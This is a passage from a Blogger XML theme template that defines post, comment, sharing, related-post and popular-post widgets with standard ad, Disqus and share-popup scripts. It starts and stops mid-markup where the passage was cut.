cond='data:post.numberOfComments > 0'> <b:message name='messages.numberOfComments'> <b:param expr:value='data:post.numberOfComments' name='numComments'/> </b:message> <b:else/> <data:messages.postAComment/> </b:if> </a> </b:includable> <b:includable id='commentsLinkIframe'> <!-- G+ comments, no longer available. The includable is retained for backwards-compatibility. --> </b:includable> <b:includable id='commentsTitle'> <!-- Post Commments Title --> <h3 class='title'><data:post.numberOfComments/> <data:messages.comments/></h3> <b:class cond='data:post.numberOfComments == "0"' name='no-comments'/> </b:includable> <b:includable id='defaultAdUnit'> <ins class='adsbygoogle' data-ad-format='auto' expr:data-ad-client='data:adClientId ?: data:blog.adsenseClientId' expr:data-ad-host='data:blog.adsenseHostId' expr:data-analytics-uacct='data:blog.analyticsAccountNumber' expr:style='data:style ?: "display: block;"'/> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </b:includable> <b:includable id='emailPostIcon'> <span class='byline post-icons'> <!-- email post links --> <span class='item-action'> <a expr:href='data:post.emailPostUrl' expr:title='data:messages.emailPost'> <b:include data='{ iconClass: "touch-icon sharing-icon" }' name='emailIcon'/> </a> </span> </span> </b:includable> <b:includable id='facebookShare'> <b:with value='"window.open(this.href, \"_blank\", \"height=430,width=640\"); return false;"' var='onclick'> <b:include name='platformShare'/> </b:with> </b:includable> <b:includable id='feedLinks'> <b:comment>Disabled</b:comment> </b:includable> <b:includable id='feedLinksBody' var='links'> <b:comment>Disabled</b:comment> </b:includable> <b:includable id='footerBylines' var='post'> <!-- Post Footer Extras --> <b:include data='post' name='postLabels'/> <b:include data='post' name='postShareButtons'/> </b:includable> <b:includable id='googlePlusShare'> <div class='goog-inline-block google-plus-share-container'> <g:plusone annotation='inline' expr:href='data:originalUrl.canonical.http' size='medium' source='blogger:blog:plusone'/> </div> </b:includable> <b:includable id='headerByline' var='post'> <!-- Post Header Meta --> <div class='post-meta'> <b:include data='post' name='postAuthor'/> <b:include data='post' name='postTimestamp'/> </div> </b:includable> <b:includable id='homePageLink'> <b:comment>Disabled</b:comment> </b:includable> <b:includable id='iframeComments' var='post'> <b:if cond='data:post.allowIframeComments'> <script expr:src='data:post.iframeCommentSrc' type='text/javascript'/> <div class='cmt_iframe_holder' expr:data-href='data:post.url.canonical' expr:data-viewtype='data:post.viewType'/> <b:if cond='!data:post.embedCommentForm'> <b:include data='post' name='commentsLink'/> </b:if> </b:if> </b:includable> <b:includable id='indexPost' var='post'> <!-- Index Post Content --> <b:include data='post' name='postFeaturedImage'/> <div class='post-content'> <div class='post-info'> <b:include data='post' name='postTitle'/> <div class='clearfix'/> <div class='post-meta'> <b:include data='post' name='postAuthor'/> <b:include data='post' name='postTimestamp'/> <b:include data='post' name='postCategory'/> </div> <div class='clearfix'/> <b:include data='post' name='postSummary'/> </div> </div> </b:includable> <b:includable id='inlineAd' var='post'> <b:comment>Disabled</b:comment> </b:includable> <b:includable id='itemPost' var='post'> <!-- Item Post Content --> <b:include data='post' name='postMeta'/> <div class='post-header'> <b:include data='post' name='postHeader'/> </div> <b:include data='post' name='postBody'/> <b:include cond='data:view.isPost' data='post' name='postFooter'/> </b:includable> <b:includable id='linkShare'> <b:with value='"window.prompt(\"Copy to clipboard: Ctrl+C, Enter\", \"" + data:originalUrl + "\"); return false;"' var='onclick'> <b:include name='platformShare'/> </b:with> </b:includable> <b:includable id='manageComments'> <a expr:href='data:post.manageCommentsUrl' expr:onclick='data:post.manageCommentsUrlOnclick'> <b:message name='messages.manageComments'/> </a> </b:includable> <b:includable id='nextPageLink'> <a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + "_blog-pager-older-link"' expr:title='data:messages.olderPosts'> <data:messages.showMore/> </a> </b:includable> <b:includable id='otherSharingButton'> <span class='sharing-platform-button sharing-element-other' expr:aria-label='data:messages.shareToOtherApps.escaped' expr:data-url='data:originalUrl' expr:title='data:messages.shareToOtherApps.escaped' role='menuitem' tabindex='-1'> <b:with value='{key: "sharingOther"}' var='platform'> <b:include name='sharingPlatformIcon'/> </b:with> <span class='platform-sharing-text'><data:messages.shareOtherApps.escaped/></span> </span> </b:includable> <b:includable id='platformShare'> <a expr:class='"goog-inline-block sharing-" + data:platform.key' expr:data-url='data:originalUrl' expr:href='data:shareUrl + "&target=" + data:platform.target' expr:onclick='data:onclick ? data:onclick : ""' expr:title='data:platform.shareMessage' target='_blank'> <span class='share-button-link-text'> <data:platform.shareMessage/> </span> </a> </b:includable> <b:includable id='post' var='post'> <!-- Post Index --> <b:include cond='data:view.isMultipleItems' data='post' name='indexPost'/> <!-- Post Item --> <b:include cond='data:view.isSingleItem' data='post' name='itemPost'/> </b:includable> <b:includable id='postAuthor' var='post'> <!-- Post Author --> <b:if cond='data:allBylineItems.author'> <span class='post-author'><a expr:href='data:post.author.profileUrl' expr:title='data:post.author.name' target='_blank'><data:post.author.name/></a></span> </b:if> </b:includable> <b:includable id='postBody' var='post'> <!-- Post Body Entry Content--> <div class='post-body post-content' id='post-body'> <data:post.body/> </div> </b:includable> <b:includable id='postBodySnippet' var='post'> <b:include data='post' name='postBody'/> </b:includable> <b:includable id='postBreadcrumbs' var='post'> <!-- Post Breadcrumbs --> <script type='application/ld+json'> { "@context": "http://schema.org", "@type": "BreadcrumbList", "itemListElement": [{ "@type": "ListItem", "position": 1, "item": { "name": "<data:messages.home/>", "@id": "<data:blog.homepageUrl.jsonEscaped/>" } },{ "@type": "ListItem", "position": 2, "item": { "name": "<b:if cond='data:post.labels'><data:post.labels.first.name/></b:if>", "@id": "<data:post.labels.last.url.jsonEscaped/>" } },{ "@type": "ListItem", "position": 3, "item": { "name": "<data:post.title/>", "@id": "<data:post.url.jsonEscaped/>" } }] } </script> </b:includable> <b:includable id='postCategory' var='post'> <!-- Post Label/Category --> <b:if cond='data:view.isMultipleItems and data:post.labels'> <span class='post-tag index-post-tag'> <data:post.labels.last.name/> </span> </b:if> </b:includable> <b:includable id='postCommentsAndAd' var='post'> <!-- Post, Comments and Ads --> <!-- Post Content Index and Item --> <div class='blog-post hentry'> <b:class cond='data:view.isMultipleItems' expr:name='"index-post wow zoomIn post-" + data:i'/> <b:class cond='data:view.isSingleItem' name='item-post'/> <b:include data='post' name='post'/> </div> <!-- Comments --> <b:if cond='data:view.isSingleItem and data:post.allowComments'> <div class='blog-post-comments'> <b:include data='post' name='threadedCommentsDisqus'/> <b:include data='post' name='commentPicker'/> </div> </b:if> <b:include cond='data:view.isPost and data:allBylineItems.backlinks' data='post' name='postNavigation'/> </b:includable> <b:includable id='postCommentsLink'> <b:if cond='data:view.isMultipleItems'> <span class='byline post-comment-link container'> <b:include cond='data:post.commentSource != 1' name='commentsLink'/> <b:include cond='data:post.commentSource == 1' name='commentsLinkIframe'/> </span> </b:if> </b:includable> <b:includable id='postFeaturedImage' var='post'> <!-- Post Featured Image on Index --> <div class='post-image-wrap'> <a class='post-image-link' expr:href='data:post.url'> <b:if cond='data:post.featuredImage'> <img class='post-thumb' expr:alt='data:post.title' expr:src='data:post.featuredImage.isYouTube ? resizeImage(data:post.featuredImage.youtubeMaxResDefaultUrl.jsonEscaped, 72, "1:1") : resizeImage(data:post.featuredImage, 72, "1:1")'/> <b:else/> <img class='post-thumb' expr:alt='data:post.title' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEnGLn1y_ydfNLPlq88boVobLEoCz4XKUZWiKMu2AQx0RQp_4NDEy-neRRelOljWsJrfxKXrG0tNe0-SKjA54F87t2e4TRVnwSLOxJkWUmjvieDpYCY_F2Qy4KjNQsxK_OCkxViBJ6t_o/w480/nth.png'/> </b:if> </a> </div> </b:includable> <b:includable id='postFooter' var='post'> <!-- Post Footer Itens --> <div class='post-footer'> <!-- Post Labels and Share Buttons --> <b:include data='post' name='footerBylines'/> <b:include data='post' name='postRelated'/> </div> </b:includable> <b:includable id='postFooterAuthorProfile' var='post'> <b:comment>Disabled</b:comment> </b:includable> <b:includable id='postHeader' var='post'> <b:include cond='data:view.isPost' data='post' name='postBreadcrumbs'/> <b:include data='post' name='postTitle'/> <b:include cond='!data:view.isPage' data='post' name='headerByline'/> </b:includable> <b:includable id='postJumpLink' var='post'> <b:comment>Disabled</b:comment> </b:includable> <b:includable id='postLabels' var='post'> <b:if cond='data:allBylineItems.labels'> <b:if cond='data:post.labels'> <div class='post-labels'> <b:loop values='data:post.labels' var='label'> <span class='Label'><a class='label-link' expr:href='data:label.url' rel='tag'><data:label.name/></a></span> </b:loop> </div> </b:if> </b:if> </b:includable> <b:includable id='postLocation'> <span class='byline post-location'> <data:byline.label/> <a expr:href='data:post.location.mapsUrl' target='_blank'><data:post.location.name/></a> </span> </b:includable> <b:includable id='postMeta' var='post'> <b:include data='post' name='postMetadataJSON'/> </b:includable> <b:includable id='postMetadataJSONImage'> "image": { "@type": "ImageObject", <b:if cond='data:post.featuredImage.isResizable'> "url": "<b:eval expr='resizeImage(data:post.featuredImage, 1200, "1200:630")'/>", "height": 630, "width": 1200 <b:else/> "url": "https://lh3.googleusercontent.com/ULB6iBuCeTVvSjjjU1A-O8e9ZpVba6uvyhtiWRti_rBAs9yMYOFBujxriJRZ-A=w1200", "height": 348, "width": 1200 </b:if> }, </b:includable> <b:includable id='postMetadataJSONPublisher'> "publisher": { "@type": "Organization", "name": "Blogger", "logo": { "@type": "ImageObject", "url": "https://lh3.googleusercontent.com/ULB6iBuCeTVvSjjjU1A-O8e9ZpVba6uvyhtiWRti_rBAs9yMYOFBujxriJRZ-A=h60", "width": 206, "height": 60 } }, </b:includable> <b:includable id='postNavigation' var='post'> <!-- Post Navigation Item --> <div class='post-nav'> <b:if cond='data:newerPageUrl'> <a class='next-post-link nav-link' expr:href='data:newerPageUrl' expr:id='data:widget.instanceId + "_blog-pager-newer-link"' rel='next'><data:messages.newer/></a> <b:else/> <span class='next-post-link nav-link'><data:messages.newest/></span> </b:if> <b:if cond='data:olderPageUrl'> <a class='prev-post-link nav-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + "_blog-pager-older-link"' rel='previous'><data:messages.older/></a> <b:else/> <span class='prev-post-link nav-link'><data:messages.oldest/></span> </b:if> </div> </b:includable> <b:includable id='postPagination'> <div class='blog-pager' id='blog-pager'> <b:include cond='data:olderPageUrl' name='nextPageLink'/> </div> </b:includable> <b:includable id='postReactions'> <span class='byline reactions'> <span class='reactions-label'> <data:byline.label/> </span> <iframe allowtransparency='true' class='reactions-iframe' expr:src='data:post.reactionsUrl' frameborder='0' name='reactions' scrolling='no'/> </span> </b:includable> <b:includable id='postRelated' var='post'> <!-- Related Posts --> <div id='related-wrap'> <div class='title-wrap'> <h3><data:messages.youMayLikeThesePosts/></h3> </div> <div class='related-ready'> <b:if cond='data:post.labels'> <div class='related-tag' expr:data-label='data:post.labels.first.name'/> <b:else/> <div class='related-tag' data-label='random'/> </b:if> </div> </div> </b:includable> <b:includable id='postShareButtons' var='post'> <!-- Post ShareButtons --> <b:if cond='data:allBylineItems.share'> <div class='post-share'> <ul class='share-links social social-color'> <b:class cond='data:blog.isMobileRequest' name='is-mobile'/> <li class='facebook-f'><a class='facebook' expr:href='"https://www.facebook.com/sharer.php?u=" + data:post.url' onclick='window.open(this.href, 'windowName', 'width=550, height=650, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li> <li class='twitter'><a class='twitter' expr:href='"https://twitter.com/intent/tweet?via=templatesyard&url=" + data:post.url + "&text=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=550, height=450, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li> <li class='pinterest-p'><a class='pinterest' expr:href='"https://www.pinterest.com/pin/create/button/?url=" + data:post.url + "&media=" + data:post.featuredImage + "&description=" + data:post.title' onclick='window.open(this.href, 'windowName', 'width=735, height=750, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li> <li class='linkedin'><a class='linkedin' expr:href='"https://www.linkedin.com/shareArticle?url=" + data:post.url' onclick='window.open(this.href, 'windowName', 'width=950, height=650, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li> <li class='whatsapp whatsapp-desktop'><a class='whatsapp' expr:href='"https://web.whatsapp.com/send?text=" + data:post.title + " | " + data:post.url' onclick='window.open(this.href, 'windowName', 'width=900, height=550, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li> <li class='whatsapp whatsapp-mobile'><a class='whatsapp' expr:href='"https://api.whatsapp.com/send?text=" + data:post.title + " | " + data:post.url' rel='nofollow' target='_blank'/></li> <li class='email'><a class='email' expr:href='"mailto:?subject=" + data:post.title + "&body=" + data:post.url' onclick='window.open(this.href, 'windowName', 'width=500, height=400, left=24, top=24, scrollbars, resizable'); return false;' rel='nofollow'/></li> </ul> </div> </b:if> </b:includable> <b:includable id='postShortMeta'> <b:comment>Disabled</b:comment> </b:includable> <b:includable id='postSummary' var='post'> <!-- Post Summary --> <p class='post-snippet'><b:eval expr='data:post.snippets.long snippet { length: 150 }'/></p> </b:includable> <b:includable id='postTimestamp' var='post'> <!-- Post Timestamp --> <b:if cond='data:allBylineItems.timestamp'> <span class='post-date published' expr:datetime='data:post.date.iso8601'><abbr class='published timeago' expr:title='data:post.date.iso8601' itemprop='datePublished'><data:post.date/></abbr></span> </b:if> </b:includable> <b:includable id='postTitle' var='post'> <!-- Post Title Index and Item --> <b:if cond='data:view.isMultipleItems'> <h2 class='post-title'> <a expr:href='data:post.url'><data:post.title/></a> </h2> </b:if> <b:if cond='data:view.isSingleItem'> <h1 class='post-title'> <data:post.title/> </h1> </b:if> </b:includable> <b:includable id='previousPageLink'> <b:comment>Disabled</b:comment> </b:includable> <b:includable id='searchMessage'> <!-- Search Message --> <b:if cond='data:view.search.query'> <div class='queryMessage'> <b:if cond='data:posts.empty'> <span class='query-info query-error'/><data:view.search.resultsMessageHtml/><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a> <b:else/> <span class='query-info query-success'><data:view.search.resultsMessageHtml/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a> </b:if> </div> </b:if> <b:if cond='data:view.search.label'> <div class='queryMessage'> <b:if cond='data:posts.empty'> <span class='query-info query-error'><data:view.search.resultsMessageHtml/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a> <b:else/> <span class='query-info query-success'><data:view.search.resultsMessageHtml/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a> </b:if> </div> </b:if> <b:if cond='data:view.isArchive'> <div class='queryMessage'> <b:if cond='data:posts.empty'> <span class='query-info query-error'><data:view.archive.rangeMessage/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a> <b:else/> <span class='query-info query-success'><data:view.archive.rangeMessage/></span><a class='show-more' expr:href='data:blog.homepageUrl'><data:messages.showAll/></a> </b:if> </div> </b:if> <b:if cond='data:view.isError'> <div class='errorWrap'> <h3>404</h3> <h4><data:messages.theresNothingHere/></h4> <p><data:navMessage/></p> <a class='homepage' expr:href='data:blog.homepageUrl'><i class='fa fa-home'/> <data:messages.home/></a> </div> </b:if> <b:if cond='data:view.isMultipleItems and data:posts.empty'><div class='queryEmpty'><data:messages.noResultsFound/></div></b:if> </b:includable> <b:includable id='sharingButton'> <span expr:aria-label='data:platform.shareMessage' expr:class='"sharing-platform-button sharing-element-" + data:platform.key' expr:data-href='data:shareUrl + "&target=" + data:platform.target' expr:data-url='data:originalUrl' expr:title='data:platform.shareMessage' role='menuitem' tabindex='-1'> <b:include name='sharingPlatformIcon'/> <span class='platform-sharing-text'><data:platform.name/></span> </span> </b:includable> <b:includable id='sharingButtonContent'> <div class='flat-icon-button ripple'> <b:include name='shareIcon'/> </div> </b:includable> <b:includable id='sharingButtons'> <div class='sharing' expr:aria-owns='"sharing-popup-" + data:sharingId' expr:data-title='data:shareTitle'> <button class='sharing-button touch-icon-button' expr:aria-controls='"sharing-popup-" + data:sharingId' expr:aria-label='data:messages.share.escaped' expr:id='"sharing-button-" + data:sharingId' role='button'> <b:include name='sharingButtonContent'/> </button> <b:include name='sharingButtonsMenu'/> </div> </b:includable> <b:includable id='sharingButtonsMenu'> <div class='share-buttons-container'> <ul aria-hidden='true' class='share-buttons hidden' expr:aria-label='data:messages.share.escaped' expr:id='"sharing-popup-" + data:sharingId' role='menu'> <b:loop values='(data:platforms ?: data:blog.sharing.platforms) filter (p => p.key not in {"blogThis"})' var='platform'> <li> <b:include name='sharingButton'/> </li> </b:loop> <li aria-hidden='true' class='hidden'> <b:include name='otherSharingButton'/> </li> </ul> </div> </b:includable> <b:includable id='sharingPlatformIcon'> <b:include data='{ iconClass: ("touch-icon sharing-" + data:platform.key) }' expr:name='data:platform.key + "Icon"'/> </b:includable> <b:includable id='threadedCommentForm' var='post'> <div class='comment-form'> <a name='comment-form'/> <b:if cond='data:this.messages.blogComment != ""'> <p><data:this.messages.blogComment/></p> </b:if> <b:include data='post' name='commentFormIframeSrc'/> <iframe allowtransparency='allowtransparency' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight ?: "90px"' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/> <data:post.cmtfpIframe/> <script type='text/javascript'> BLOG_CMT_createIframe('<data:post.appRpcRelayPath/>'); </script> </div> </b:includable> <b:includable id='threadedCommentJs' var='post'> <script async='async' expr:src='data:post.commentSrc' type='text/javascript'/> <b:template-script inline='true' name='threaded_comments'/> <script type='text/javascript'> blogger.widgets.blog.initThreadedComments( <data:post.commentJso/>, <data:post.commentMsgs/>, <data:post.commentConfig/>); </script> </b:includable> <b:includable id='threadedComments' var='post'> <section class='comments threaded' expr:data-embed='data:post.embedCommentForm' expr:data-num-comments='data:post.numberOfComments' id='comments'> <a name='comments'/> <b:include name='commentsTitle'/> <div class='comments-content'> <b:if cond='data:post.embedCommentForm'> <b:include data='post' name='threadedCommentJs'/> </b:if> <div id='comment-holder'> <data:post.commentHtml/> </div> </div> <p class='comment-footer'> <b:if cond='data:post.allowNewComments'> <b:include data='post' name='threadedCommentForm'/> <b:else/> <data:post.noNewCommentsText/> </b:if> </p> <b:if cond='data:showCmtPopup'> <div id='comment-popup'> <iframe allowtransparency='allowtransparency' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'> </iframe> </div> </b:if> </section> </b:includable> <b:includable id='threadedCommentsDisqus' var='post'> <script type='text/javascript'> var disqus_blogger_current_url = "<data:blog.canonicalUrl/>"; if (!disqus_blogger_current_url.length) { disqus_blogger_current_url = "<data:blog.url/>"; } var disqus_blogger_homepage_url = "<data:blog.homepageUrl/>"; var disqus_blogger_canonical_homepage_url = "<data:blog.canonicalHomepageUrl/>"; </script> </b:includable> </b:widget> </b:section> </div> <!-- Sidebar Wrapper --> <div id='sidebar-wrapper'> <b:section class='sidebar common-widget' id='sidebar' name='Sidebar Right' showaddelement='yes'> <b:widget id='PopularPosts1' locked='false' title='Popular Posts' type='PopularPosts' version='2' visible='true'> <b:widget-settings> <b:widget-setting name='numItemsToShow'>3</b:widget-setting> <b:widget-setting name='showThumbnails'>true</b:widget-setting> <b:widget-setting name='showSnippets'>true</b:widget-setting> <b:widget-setting name='timeRange'>LAST_WEEK</b:widget-setting> </b:widget-settings> <b:includable id='main' var='this'> <b:include name='widget-title'/> <div class='widget-content'> <b:loop values='data:posts' var='post'> <b:include data='post' name='postContent'/> </b:loop> </div> </b:includable> <b:includable id='blogThisShare'> <b:with value='"window.open(this.href, \"_blank\", \"height=270,width=475\"); return false;"' var='onclick'> <b:include name='platformShare'/> </b:with> </b:includable> <b:includable id='bylineByName' var='byline'> <b:switch var='data:byline.name'> <b:case value='share'/> <b:include cond='data:post.shareUrl' name='postShareButtons'/> <b:case value='comments'/> <b:include cond='data:post.allowComments' name='postCommentsLink'/> <b:case value='location'/> <b:include cond='data:post.location' name='postLocation'/> <b:case value='timestamp'/> <b:include cond='not data:view.isPage' name='postTimestamp'/> <b:case value='author'/> <b:include name='postAuthor'/> <b:case value='labels'/> <b:include cond='data:post.labels' name='postLabels'/> <b:case value='icons'/> <b:include cond='data:post.emailPostUrl' name='emailPostIcon'/> <b:case value='reactions'/> <b:include cond='data:post.reactionsUrl' name='postReactions'/> </b:switch> </b:includable> <b:includable id='bylineRegion' var='regionItems'> <b:loop values='data:regionItems' var='byline'> <b:include data='byline' name='bylineByName'/> </b:loop> </b:includable> <b:includable id='commentsLink'> <a class='comment-link' expr:href='data:post.commentsUrl' expr:onclick='data:post.commentsUrlOnclick'> <b:if cond='data:post.numberOfComments > 0'> <b:message name='messages.numberOfComments'> <b:param expr:value='data:post.numberOfComments' name='numComments'/> </b:message> <b:else/> <data:messages.postAComment/> </b:if> </a> </b:includable> <b:includable id='commentsLinkIframe'> <!-- G+ comments, no longer available. The includable is retained for backwards-compatibility. --> </b:includable> <b:includable id='default' var='post'> <div class='post default-popularpost'> <b:class expr:name='"item-"+data:i'/> <div class='post-content'> <a class='post-image-link' expr:href='data:post.url'> <b:if cond='data:post.featuredImage'> <img class='post-thumb' expr:alt='data:post.title' expr:src='data:post.featuredImage.isYouTube ? resizeImage(data:post.featuredImage.youtubeMaxResDefaultUrl.jsonEscaped, 72, "1:1") : resizeImage(data:post.featuredImage, 72, "1:1")'/> <b:else/> <img class='post-thumb' expr:alt='data:post.title' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEnGLn1y_ydfNLPlq88boVobLEoCz4XKUZWiKMu2AQx0RQp_4NDEy-neRRelOljWsJrfxKXrG0tNe0-SKjA54F87t2e4TRVnwSLOxJkWUmjvieDpYCY_F2Qy4KjNQsxK_OCkxViBJ6t_o/w680/nth.png'/> </b:if> </a> <div class='post-info'> <h2 class='post-title'> <a expr:href='data:post.url'><data:post.title/></a> </h2> <div class='post-meta'> <span class='post-date published' expr:datetime='data:post.date.iso8601'><data:post.date/></span> </div> </div> </div> </div> </b:includable> <b:includable id='emailPostIcon'> <span class='byline post-icons'> <!-- email post links --> <span class='item-action'> <a expr:href='data:post.emailPostUrl' expr:title='data:messages.emailPost'> <b:include data='{ iconClass: "touch-icon sharing-icon" }' name='emailIcon'/> </a> </span> </span> </b:includable> <b:includable id='facebookShare'> <b:with value='"window.open(this.href, \"_blank\", \"height=430,width=640\"); return false;"' var='onclick'> <b:include name='platformShare'/> </b:with> </b:includable> <b:includable id='footerBylines'> <b:if cond='data:widgets.Blog.first.footerBylines'> <b:loop index='i' values='data:widgets.Blog.first.footerBylines' var='region'> <b:if cond='not data:region.items.empty'> <div expr:class='"post-footer-line post-footer-line-" + (data:i + 1)'> <b:with value='"footer-" + (data:i + 1)' var='regionName'> <b:include data='region.items' name='bylineRegion'/> </b:with> </div> </b:if> </b:loop> </b:if> </b:includable> <b:includable id='googlePlusShare'> <div class='goog-inline-block google-plus-share-container'> <g:plusone annotation='inline' expr:href='data:originalUrl.canonical.http' size='medium' source='blogger:blog:plusone'/> </div> </b:includable> <b:includable id='headerByline'> <b:if cond='data:widgets.Blog.first.headerByline'> <div class='post-header'> <div class='post-header-line-1'> <b:with value='"header-1"' var='regionName'> <b:include data='data:widgets.Blog.first.headerByline.items' name='bylineRegion'/> </b:with> </div> </div> </b:if> </b:includable> <b:includable id='linkShare'> <b:with value='"window.prompt(\"Copy to clipboard: Ctrl+C, Enter\", \"" + data:originalUrl + "\"); return false;"' var='onclick'> <b:include name='platformShare'/> </b:with> </b:includable> <b:includable id='otherSharingButton'> <span class='sharing-platform-button sharing-element-other' expr:aria-label='data:messages.shareToOtherApps.escaped' expr:data-url='data:originalUrl' expr:title='data:messages.shareToOtherApps.escaped' role='menuitem' tabindex='-1'> <b:with value='{key: "sharingOther"}' var='platform'> <b:include name='sharingPlatformIcon'/> </b:with> <span class='platform-sharing-text'><data:messages.shareOtherApps.escaped/></span> </span> </b:includable> <b:includable id='platformShare'> <a expr:class='"goog-inline-block sharing-" + data:platform.key' expr:data-url='data:originalUrl' expr:href='data:shareUrl + "&target=" + data:platform.target' expr:onclick='data:onclick ? data:onclick : ""' expr:title='data:platform.shareMessage' target='_blank'> <span class='share-button-link-text'> <data:platform.shareMessage/> </span> </a> </b:includable> <b:includable id='postAuthor'> <span class='byline post-author vcard'> <span class='post-author-label'> <data:byline.label/> </span> <span class='fn'> <b:if cond='data:post.author.profileUrl'> <meta expr:content='data:post.author.profileUrl'/> <a class='g-profile' expr:href='data:post.author.profileUrl' rel='author' title='author profile'> <span><data:post.author.name/></span> </a> <b:else/> <span><data:post.author.name/></span> </b:if> </span> </span> </b:includable> <b:includable id='postCommentsLink'> <span class='byline post-comment-link container'> <b:include cond='data:post.commentSource != 1' name='commentsLink'/> </span> </b:includable> <b:includable id='postContent' var='post'> <div class='post'> <div class='post-content'> <a class='post-image-link' expr:href='data:post.url'> <b:if cond='data:post.featuredImage'> <img class='post-thumb' expr:alt='data:post.title' expr:src='data:post.featuredImage.isYouTube ? resizeImage(data:post.featuredImage.youtubeMaxResDefaultUrl.jsonEscaped, 72, "1:1") : resizeImage(data:post.featuredImage, 72, "1:1")'/> <b:else/> <img class='post-thumb' expr:alt='data:post.title' src='https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEnGLn1y_ydfNLPlq88boVobLEoCz4XKUZWiKMu2AQx0RQp_4NDEy-neRRelOljWsJrfxKXrG0tNe0-SKjA54F87t2e4TRVnwSLOxJkWUmjvieDpYCY_F2Qy4KjNQsxK_OCkxViBJ6t_o/w100/nth.png'/> </b:if> </a> <div class='post-info'> <h2 class='post-title'> <a expr:href='data:post.url'><data:post.title/></a> </h2> <div class='post-meta'> <span class='post-date published' expr:datetime='data:post.date.iso8601'><data:post.date/></span> </div> </div> </div> </div> </b:includable> <b:includable id='postJumpLink' var='post'> <div class='jump-link flat-button'> <a expr:href='data:post.url fragment "more"' expr:title='data:post.title'> <b:eval expr='data:blog.jumpLinkMessage'/> </a> </div> </b:includable> <b:includable id='postLabels'> <span class='byline post-labels'> <span class='byline-label'><data:byline.label/></span> <b:loop index='i' values='data:post.labels' var='label'> <a expr:href='data:label.url' rel='tag'> <data:label.name/> </a> </b:loop> </span> </b:includable> <b:includable id='postLocation'> <span class='byline post-location'> <data:byline.label/> <a expr:href='data:post.location.mapsUrl' target='_blank'><data:post.location.name/></a> </span> </b:includable> <b:includable id='postReactions'> <span class='byline reactions'> <span class='reactions-label'> <data:byline.label/> </span> <iframe allowtransparency='true' class='reactions-iframe' expr:src='data:post.reactionsUrl' frameborder='0' name='reactions' scrolling='no'/> </span> </b:includable> <b:includable id='postShareButtons'> <div class='byline post-share-buttons goog-inline-block'> <b:with value='data:sharingId ?: ((data:widget.instanceId ?: "sharing") + "-" + (data:regionName ?: "byline") + "-" + data:post.id)' var='sharingId'> <!-- Note: 'sharingButtons' includable is from the default Sharing widget markup. --> <b:include data='{ sharingId: data:sharingId, originalUrl: data:post.url, platforms: data:this.sharing.platforms, shareUrl: data:post.shareUrl, shareTitle: data:post.title, }' name='sharingButtons'/> </b:with> </div> </b:includable> <b:includable id='postTimestamp'> <span class='byline post-timestamp'> <data:byline.label/> <b:if cond='data:post.url'> <meta expr:content='data:post.url.canonical'/> <a class='timestamp-link' expr:href='data:post.url' rel='bookmark' title='permanent link'> <time class='published' expr:datetime='data:post.date.iso8601' expr:title='data:post.date.iso8601'> <abbr class='published timeago' expr:title='data:post.date.iso8601' itemprop='datePublished'><data:post.date/></abbr> </time> </a> </b:if> </span> </b:includable> <b:includable id='sharingButton'> <span expr:aria-label='data:platform.shareMessage' expr:class='"sharing-platform-button sharing-element-" + data:platform.key' expr:data-href='data:shareUrl + "&target=" + data:platform.target' expr:data-url='data:originalUrl' expr:title='data:platform.shareMessage' role='menuitem' tabindex='-1'> <b:include name='sharingPlatformIcon'/> <span class='platform-sharing-text'><data:platform.name/></span> </span> </b:includable> <b:includable id='sharingButtonContent'> <div class='flat-icon-button ripple'> <b:include name='shareIcon'/> </div> </b:includable> <b:includable id='sharingButtons'> <div class='sharing' expr:aria-owns='"sharing-popup-" + data:sharingId' expr:data-title='data:shareTitle'> <button class='sharing-button touch-icon-button' expr:aria-controls='"sharing-popup-" + data:sharingId' expr:aria-label='data:messages.share.escaped' expr:id='"sharing-button-" + data:sharingId' role='button'> <b:include name='sharingButtonContent'/> </button> <b:include name='sharingButtonsMenu'/> </div> </b:includable> <b:includable id='sharingButtonsMenu'> <div class='share-buttons-container'> <ul aria-hidden='true' class='share-buttons hidden' expr:aria-label='data:messages.share.escaped' expr:id='"sharing-popup-" + data:sharingId' role='menu'> <b:loop values='(data:platforms ?: data:blog.sharing.platforms) filter (p => p.key not in {"blogThis"})' var='platform'> <li> <b:include name='sharingButton'/> </li> </b:loop> <li aria-hidden='true' class='hidden'> <b:include name='otherSharingButton'/> </li> </ul> </div> </b:includable> <b:includable id='sharingPlatformIcon'> <b:include data='{ iconClass: ("touch-icon sharing-" + data:platform.key) }' expr:name='data:platform.key + "Icon"'/> </b:includable> <b:includable id='slider-section' var='post'> <b:if cond='data:i lt 10'> <li class='slider-item'> <b:class expr:name='"item-"+data:i'/> <a class='post-image-link' expr:href='data:post.url'> <b:if cond='data:post.featuredImage'> <img class='post-thumb' expr:alt='data:post.title' expr:src='data:post.featuredImage.isYouTube ? resizeImage(data:post.featuredImage.youtubeMaxResDefaultUrl.jsonEscaped, 72, "1:1") : resizeImage(data:post.featuredImage, 72, "1:1")'/> <b:else/> <img class='post-thumb' expr:alt='data:post.title' 